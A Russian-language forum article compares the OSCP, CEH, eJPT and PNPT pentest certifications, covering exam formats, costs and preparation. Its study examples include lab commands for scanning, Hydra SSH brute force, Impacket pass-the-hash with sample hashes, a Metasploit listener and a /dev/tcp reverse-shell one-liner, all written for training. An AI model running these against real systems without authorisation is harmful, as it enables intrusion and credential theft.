Статья Сертификация по пентесту: OSCP vs CEH vs eJPT vs PNPT — честное сравнение от практика

Сертификация по пентесту — рабочий стол пентестера с сертификатами OSCP, CEH, eJPT и терминалом Kali Linux


Каждый год в русскоязычном сегменте появляются десятки статей в духе «топ-5 сертификатов по кибербезопасности», где все четыре аббревиатуры стоят в одном списке с одинаковыми оценками «отлично подходит для начинающих». Проблема в том, что эти статьи пишут люди, которые ни одного из этих экзаменов не сдавали.

Мой коллега прошёл OSCP и eJPT лично, готовился к PNPT и видел формат CEH у коллег. Каждый день работаю с Burp Suite, Nmap, BloodHound и Impacket - и точно знаю, какая из сертификаций реально готовит к работе с этим стеком, а какая проверяет умение ткнуть в правильный вариант из четырёх. Ниже - его сравнение без маркетинга, с цифрами, форматами экзаменов и конкретными рекомендациями на 2025 год.

Зачем пентестеру сертификация в 2025 году​

Рынок ИБ разросся настолько, что HR физически не может оценить технический уровень кандидата при первичном скрининге. Сертификация по пентесту стала фильтром - причём разные сертификаты работают как фильтры для разных типов контор.

В 2025 году расклад такой:
  • Государственные и compliance-ориентированные организации требуют CEH, потому что он вписан в рамки вроде DoD 8570 (по данным EC-Council и подтверждённым требованиям в вакансиях на defence-площадках).
  • Консалтинговые компании и красные команды смотрят на OSCP как на минимальный порог входа. Нет OSCP - резюме часто даже не открывают.
  • Стартапы и bug bounty площадки оценивают портфолио и практический опыт, но eJPT или PNPT показывают, что человек хотя бы способен самостоятельно пробить машину.
Ни один сертификат не заменяет реальный опыт. Но на собеседовании, когда у двух кандидатов одинаковые навыки, преимущество получает тот, кто подтвердил их независимой оценкой.

OSCP - золотой стандарт OffSec сертификации​

OSCP (Offensive Security Certified Professional) - то, что рекрутеры называют «gold standard» для наступательной безопасности. И не случайно: экзамен проверяет не знание терминов, а способность взломать реальные машины за ограниченное время и написать по этому поводу профессиональный отчёт.

OffSec сертификация строится вокруг философии «Try Harder» - тебе не дают подсказок, готовых решений или вариантов ответов. Либо ты эксплуатируешь уязвимость и получаешь флаг, либо нет. Жёстко, но честно.

Что изменилось в OSCP+ в 2024-2025​

OffSec запустила обновлённый формат - OSCP+. По данным OffSec, кандидаты получают два статуса: классический пожизненный OSCP и трёхлетний возобновляемый OSCP+.

Что изменилось для тех, кто сдаёт в 2025 году:
  • Убрали 10 бонусных баллов, которые раньше начислялись за выполнение упражнений курса и документирование решений лабораторных машин. Теперь весь результат определяется исключительно экзаменом - никаких «подушек безопасности». Лично я считаю это правильным - бонусы размывали ценность сертификата.
  • Усилен фокус на Active Directory. Экзамен по-прежнему включает сценарий «assumed compromise» в AD-части. Кандидат начинает с низкопривилегированным доступом внутри домена и должен добраться до Domain Admin. Это прямое отражение реальных пентестов, где начальная точка - фишинг или скомпрометированный аккаунт.
  • Интеграция облачных модулей и AI-фидбэка в лабораторных средах (пока в бета-режиме).
Формат экзамена остаётся жёстким: 23 часа 45 минут на эксплуатацию машин в контролируемой лабораторной среде, плюс 24 часа на написание профессионального отчёта. В отчёте нужно задокументировать каждый шаг - от Network Service Discovery (T1046) до финального Exploitation for Privilege Escalation (T1068). Если отчёт слабый - даже полностью взломанные машины не засчитают. Видел случаи, когда люди пробивали все машины и проваливались на отчёте.

Как готовиться к OSCP - конкретный план​

Подготовка занимает от 3 до 6 месяцев при полной занятости. Вот что я делал и что рекомендую:

Первый шаг - убедиться, что база на месте. Ты должен свободно работать в терминале Linux, понимать TCP/IP на уровне чтения pcap-дампов и писать скрипты на Python/Bash. Если не можешь - начни с eJPT, серьёзно.
Bash:
# Базовое сканирование - это первое, что ты делаешь на экзамене
nmap -sC -sV -oA initial_scan 10.10.10.0/24

# Полное сканирование портов (не пропускай высокие порты)
nmap -p- -T4 -oA full_scan 10.10.10.5

# Скрипт для автоматизации начального перебора
# Сначала генерируем список живых хостов из результатов ping-сканирования
nmap -sn 10.10.10.0/24 -oG - | grep 'Up' | awk '{print $2}' > targets.txt
# Внимание: ограничиваем параллелизм, чтобы не перегрузить систему
mkdir -p scans && cat targets.txt | xargs -P 5 -I {} sh -c 'nmap -sC -sV -oN "scans/$(echo {} | tr "." "_").txt" {}'
Второй шаг - курс PEN-200 (Penetration Testing with Kali Linux). Это официальный курс OffSec, который идёт в комплекте с ваучером на экзамен. Проработай каждую лабораторную - их десятки. Не пропускай ни одну, даже если кажется «слишком простой».

Третий шаг - дополнительная практика. Hack The Box и TryHackMe - платформы, где можно отточить навыки на OSCP-подобных машинах. Особый акцент: Active Directory. На экзамене AD-цепочка может дать больше половины баллов.

Стоимость: курс PEN-200 + 90 дней лабораторного доступа + один ваучер на экзамен - от 1599 долларов (по данным OffSec). Пересдача - за отдельные деньги. Да, недёшево. Но дешевле, чем провалить собеседование в компанию мечты.

CEH - сертификат этичного хакера от EC-Council​

CEH (Certified Ethical Hacker) - самая «медийная» сертификация в области этичного хакинга. Её знают HR-специалисты, которые никогда не слышали ни про OSCP, ни про eJPT. Именно поэтому CEH до сих пор всплывает в требованиях к вакансиям - особенно в госсекторе и крупных корпорациях.

Формат экзамена CEH​

Экзамен - 125 вопросов с вариантами ответов, 4 часа. Практическая часть (CEH Practical) продаётся отдельно и не обязательна для получения базового сертификата. То есть можно получить «Certified Ethical Hacker» ни разу ничего не взломав. Занятный момент.

Темы охватывают широкий спектр: от разведки (Reconnaissance) и сканирования до малвари, социальной инженерии и криптографии. По данным EC-Council, курс покрывает использование Nmap, Metasploit, Wireshark, Burp Suite - но на уровне «что это такое и зачем», а не «как написать кастомный эксплойт».

Требования: либо пройти официальное обучение EC-Council, либо подтвердить двухлетний опыт работы в ИБ.

Стоимость: официальное обучение плюс экзамен обходится ощутимо дороже, чем eJPT или PNPT. Точные цены зависят от региона и формата (онлайн/очно), но по деньгам сопоставимо с OSCP.

Сертификат действует 3 года. Продление - через CPE-кредиты или пересдачу.

CEH vs OSCP - в чём принципиальная разница

Вот объяснение, которое я даю на каждом собеседовании, когда спрашивают:

CEH проверяет, знаешь ли ты, что такое (T1550.002, Lateral Movement). OSCP проверяет, можешь ли ты выполнить Pass the Hash в реальном AD-окружении, перемещаясь между машинами через Impacket:
Bash:
# Pass the Hash через Impacket - то, что ты делаешь на OSCP
# Стандартная команда из документации Impacket
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b administrator@10.10.10.5

# Или через CrackMapExec для проверки хеша по подсети
crackmapexec smb 10.10.10.0/24 -u administrator -H e02bc503339d51f71d913c245d35b50b
CEH даст вопрос: «Какой инструмент используется для атаки Pass the Hash?» с вариантами A) Wireshark B) Mimikatz C) Burp Suite D) Nikto. OSCP бросит тебя в лабораторию, где ты должен сначала дампнуть хеши ( , T1003), а потом использовать их для латерального движения - без подсказок и вариантов ответов.

CEH не бесполезен. Он полезен как входной билет в compliance-ориентированные организации и как структурированное введение в терминологию. Но если хочешь работать руками - CEH этому не научит. Точка.

eJPT - точка входа в мир сертификаций пентестера​

eJPT (eLearnSecurity Junior Penetration Tester) - сертификат от INE (бывшая eLearnSecurity), который позиционируется как первый практический экзамен для начинающих. И это действительно так - я сдавал eJPT до OSCP и могу подтвердить: он отлично калибрует базовые навыки.

Формат экзамена eJPT​

По данным INE, экзамен полностью практический: 48 часов на выполнение заданий в виртуальной среде. Проходной балл - 70%. Стоимость начинается от 249 долларов, включая ваучер на экзамен и три месяца доступа к обучающим материалам. Сертификат действует три года.

Экзамен проверяет четыре направления:
  • Методологии оценки безопасности
  • Аудит устройств и сетей
  • Тестирование на проникновение сетей
  • Тестирование на проникновение веб-приложений
На практике: тебе нужно просканировать сеть и идентифицировать сервисы (Network Service Discovery, T1046, Discovery - ты уже подключён к виртуальной среде экзамена), найти уязвимость и проэксплуатировать её. Без написания кастомных эксплойтов - достаточно уверенного использования стандартных инструментов.

Что даёт eJPT на рынке труда​

Честно - eJPT сертификат сам по себе не откроет двери в крупную компанию. Но он решает две конкретные задачи.

Во-первых, показывает рекрутеру, что ты не просто «прошёл курс на Coursera», а реально ломал машины в контролируемой среде. Для junior-позиций в 2025 году это имеет значение.

Во-вторых, eJPT - отличный индикатор готовности к OSCP. Сдал eJPT за 12 часов из 48 - можно смело идти на OSCP. Еле уложился в 48 - нужно ещё практиковаться. Такой вот лакмусовый тест.

PNPT - практическая сертификация от TCM Security​

PNPT (Practical Network Penetration Tester) от TCM Security - относительно новая сертификация, которая быстро набрала популярность в англоязычном сообществе. Создатель - Heath Adams (TheCyberMentor) - хорошо известен по YouTube-каналу и курсам, которые многие считают одними из лучших для самоподготовки.

Что проверяет PNPT​

PNPT сертификация охватывает полный цикл пентеста: от OSINT и внешней разведки до эксплуатации внутренней Active Directory инфраструктуры. Экзамен практический - нужно провести полноценный пентест в выделенной среде и написать профессиональный отчёт.

Фишка PNPT: после сдачи практической части нужно пройти устное собеседование с экзаменатором, где ты защищаешь свой отчёт и объясняешь найденные уязвимости. Это максимально приближено к реальной работе - когда презентуешь результаты пентеста заказчику и тебя засыпают вопросами.

Курсы TCM Security, входящие в подготовку, высоко оцениваются сообществом. Они покрывают практическую работу с Active Directory, включая Kerberoasting, AS-REP Roasting и техники латерального перемещения.

Проблемы с целостностью экзамена PNPT​

Тут надо быть честным. Согласно публикации исследователя Quintius Walker (GreyHatDev), в сети были обнаружены материалы, компрометирующие целостность экзамена PNPT - фактически готовые ответы к экзаменационным заданиям. Подобная проблема ранее затрагивала и другие сертификации, но для PNPT это особенно болезненно: именно практичность и подлинность экзамена были главными аргументами в её пользу.

Означает ли это, что PNPT не стоит сдавать? Нет. Обучающие материалы TCM Security по-прежнему качественные. Но ценность PNPT на рынке пока ниже, чем у OSCP, и подобные инциденты не помогают ей расти.

Лучшая сертификация по кибербезопасности 2025 - сравнительная таблица​

ПараметрOSCPCEHeJPTPNPT
ПровайдерOffSecEC-CouncilINE (eLearnSecurity)TCM Security
УровеньIntermediate-AdvancedBeginner-IntermediateBeginnerBeginner-Intermediate
Формат экзамена23ч 45мин практика + 24ч отчёт125 вопросов MCQ, 4 часа48 часов, практикаПрактика + отчёт + устная защита
Стоимость (от)~1599 USD (курс + экзамен)Сопоставима с OSCP (зависит от формата)от 249 USDЗависит от пакета курсов
Срок действияOSCP - пожизненно, OSCP+ - 3 года3 года (CPE для продления)3 годаПожизненно (без ресертификации)
Фокус на ADДа, усиленный в OSCP+ТеоретическийБазовыйДа, практический
Признание HRВысокое в техкомпанияхВысокое в госсектореНизкое-среднееРастущее
Проходной балл70 баллов из 100Зависит от версии70%Оценка практики + защита
Навыки для сдачиLinux, сети, скрипты, ADБазовые IT-знанияБазовые сети и LinuxСети, Linux, базовый AD

Какую сертификацию по пентесту выбрать - дерево решений​

Забудьте универсальные рекомендации. Выбор зависит от трёх вещей: текущий уровень, целевая позиция и бюджет.

Путь для новичков без опыта в ИТ​

Если ты не можешь объяснить, чем TCP отличается от UDP, или не работал в терминале Linux - начинать с OSCP бессмысленно. Потратишь деньги и провалишь экзамен. Я видел такое не раз.

Маршрут: сначала бесплатные ресурсы (TryHackMe, OverTheWire) для фундамента. Затем eJPT как первый сертификат - от 249 долларов и 48 часов на экзамен, что достаточно комфортно для начинающего. После eJPT оценивай свои силы и двигайся к OSCP или PNPT.

Путь для ИТ-специалистов, переходящих в ИБ

Если у тебя есть опыт сисадминства, разработки или сетевой инженерии - ты уже знаешь половину того, что нужно. Вопрос - куда хочешь попасть.

В госсектор или compliance - CEH. Он откроет двери, а практические навыки будешь добирать на работе.

В консалтинг или красную команду - сразу OSCP. Да, будет тяжело. Но каждый час подготовки к OSCP - это реальный навык, который пригодится на проекте. Никто не нанимает пентестера за красивый сертификат, если он не может поднять reverse shell:
Bash:
# Типичная задача на OSCP - получить reverse shell через найденную уязвимость
# Стандартная команда msfconsole из документации Metasploit
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; run"

# Или без Metasploit - через netcat (One-liner для Linux)
nc -lvnp 4444
# На целевой машине (пример для демонстрации концепции):
# bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

Путь для практикующих пентестеров​

Если ты уже работаешь пентестером и хочешь подтвердить квалификацию - только OSCP. Ни CEH, ни eJPT, ни PNPT не дадут такого веса в резюме. OSCP - единственная сертификация, которую технические интервьюеры в 2025 году уважают без оговорок.

После OSCP - смотри на OSWE (веб-эксплуатация), OSEP (продвинутый пентест) или CRTO (Cobalt Strike, Red Team Operations).

Практический блок - от выбора до сдачи экзамена​

Базовые навыки, которые проверяют все сертификации​

Независимо от выбранного сертификата, ты должен свободно владеть следующими техниками (привожу с маппингом на MITRE ATT&CK - именно этот фреймворк используется в реальных отчётах):

Разведка и сканирование - при внешнем сканировании до получения доступа: Active Scanning (T1595, Reconnaissance); при внутреннем сканировании после получения доступа к сети: Network Service Discovery (T1046, Discovery):
Bash:
# Пример рабочего процесса разведки (стандартные команды)
# 1. Обнаружение живых хостов
nmap -sn 192.168.1.0/24 -oG alive_hosts.txt

# 2. Сканирование портов и сервисов на обнаруженных хостах
nmap -sC -sV -p- -oA full_scan 192.168.1.100

# 3. Перебор директорий веб-приложения
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -o dirs.txt
Брутфорс - Brute Force (T1110, Credential Access). Все сертификации так или иначе тестируют способность провести подбор учётных данных:
Bash:
# Онлайн-брутфорс SSH (стандартная команда Hydra)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Офлайн-подбор хешей (стандартная команда John the Ripper)
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Повышение привилегий - Exploitation for Privilege Escalation (T1068, Privilege Escalation). На OSCP это критически важно: примерно половина машин требует privesc после получения начального доступа.

Дампинг учётных данных - OS Credential Dumping (T1003, Credential Access). На OSCP в AD-сценарии ты будешь извлекать хеши из LSASS, SAM и NTDS.dit. На CEH тебя спросят, что такое LSASS. Разница - как между чтением рецепта и готовкой ужина.

Выполнение команд - Command and Scripting Interpreter (T1059, Execution). Умение быстро накидать скрипт на Python или Bash, который автоматизирует рутину - без этого OSCP не пройти.

Что спрашивают на собеседованиях в 2025 году​

Я проводил технические интервью и проходил их сам. Вот что реально спрашивают у кандидатов с разными сертификатами:

У кандидата с CEH спросят: «Расскажите, как бы вы проводили пентест корпоративной сети». Ожидают методологию - разведка, сканирование, эксплуатация, пост-эксплуатация, отчёт. Базовый уровень.

У кандидата с OSCP спросят: «Вы получили низкопривилегированный шелл на Windows-машине в домене. Ваши следующие шаги?» И тут ожидают конкретику: проверить привилегии (whoami /priv), посмотреть членство в группах, запустить WinPEAS или PowerUp, проверить SeImpersonatePrivilege для Potato-атак, попробовать извлечь хеши. Если ты на этом вопросе плывёшь - OSCP в резюме не спасёт.

У кандидата с eJPT будут более мягкие вопросы, но всё равно практические: «Какие порты и сервисы вы проверяете первыми при внешнем пентесте?» Ожидают: 21 (FTP), 22 (SSH), 80/443 (HTTP/HTTPS), 445 (SMB), 3389 (RDP) - и объяснение, почему.

Отдельная тема - знание реальных уязвимостей. Если ты не можешь объяснить, как работает (CVE-2017-0144, CVSS 8.8 HIGH - уязвимость SMBv1 в Windows, позволяющая удалённое выполнение кода через специально сформированные пакеты; CVSS-вектор NVD указывает PR:L (требуется аутентифицированная SMB-сессия). В некоторых конфигурациях Windows с включённым гостевым доступом или null-сессиями порог может быть ниже, но это зависит от настроек целевой системы) или (CVE-2021-44228, CVSS 10.0 CRITICAL - RCE через JNDI lookup injection в Apache Log4j2 версий 2.0-beta9 до 2.15.0, исключая 2.12.2, 2.12.3 и 2.3.1, позволяющая выполнение произвольного кода через контролируемые атакующим LDAP-серверы; NVD классифицирует как CWE-917, CWE-502, CWE-20 и CWE-400), это красный флаг для интервьюера. Эти CVE - «классика», которую проходят в любом серьёзном курсе. OSCP и eJPT дают практику эксплуатации подобных уязвимостей в лабораторных средах. CEH - нет.

Итог - матрица решений​

Чтобы не ходить кругами:
  • Нет опыта, хочешь попробовать себя в пентесте - eJPT. Минимальный порог входа, практический экзамен, адекватная цена от 249 долларов.
  • Есть ИТ-опыт, целишься в госсектор или compliance - CEH. Признан во всём мире как baseline-сертификат для регулируемых отраслей.
  • Есть ИТ-опыт, хочешь стать пентестером или попасть в красную команду - OSCP. Без вариантов. Сложно, дорого, долго - но это единственный сертификат, который технический менеджер уважает безоговорочно.
  • Хочешь структурированное обучение с акцентом на AD и soft skills (написание отчётов, защита перед заказчиком) - PNPT. Хорошие обучающие материалы, но рыночный вес пока ниже OSCP. Пожизненный срок действия без механизма ресертификации - это и плюс (нет дополнительных расходов), и минус (сертификат не подтверждает актуальность навыков со временем).
Никто не запрещает комбинировать. Многие начинают с eJPT, затем берут PNPT для углубления в AD, а потом идут на OSCP. Рабочий маршрут, который занимает 12-18 месяцев при активной подготовке.

И последнее. Не путай сертификат с компетенцией. Бумага открывает двери на собеседование, но за столом напротив сидит человек, который попросит объяснить, как ты проводил Kerberoasting или почему выбрал Chisel вместо SSH-туннеля. И тут уже не важно, какие буквы стоят после твоего имени - важно, что ты реально умеешь делать руками. Попробуй развернуть лабу на один вечер, подними AD на двух виртуалках и пройди цепочку от Kerberoasting до DCSync. Если получится - ты готов. Если нет - теперь знаешь, что учить.
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы